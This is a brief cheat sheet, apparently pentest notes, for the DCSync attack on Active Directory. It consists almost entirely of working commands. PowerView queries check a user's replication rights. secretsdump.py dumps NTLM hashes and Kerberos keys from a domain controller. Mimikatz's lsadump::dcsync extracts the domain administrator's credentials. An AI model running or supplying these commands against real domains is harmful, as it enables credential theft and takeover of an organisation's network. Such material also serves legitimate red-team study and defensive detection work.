DCSync
# Using Get-DomainUser to View user's Group Membership
Get-DomainUser -Identity eren |select samaccountname,objectsid,memberof,useraccountcontrol |fl
# Note SID and domain
# Using Get-ObjectAcl to Check user's Replication Rights
$sid= "S-1-5-21-3842939050-3880317879-2865463114-1164"
Get-ObjectAcl "DC=domain,DC=local" -ResolveGUIDs | ? { ($_.ObjectAceType -match 'Replication-Get')} | ?{$_.SecurityIdentifier -match $sid} |select AceQualifier, ObjectDN, ActiveDirectoryRights,SecurityIdentifier,ObjectAceType | fl
# Extracting NTLM Hashes and Kerberos Keys Using secretsdump.py
secretsdump.py -outputfile extracted_hashes -just-dc DOMAIN/eren@ip
# Performing the Attack with Mimikatz
.\mimikatz.exe
lsadump::dcsync /domain:DOMAIN.LOCAL /user:DOMAIN\administratorLast updated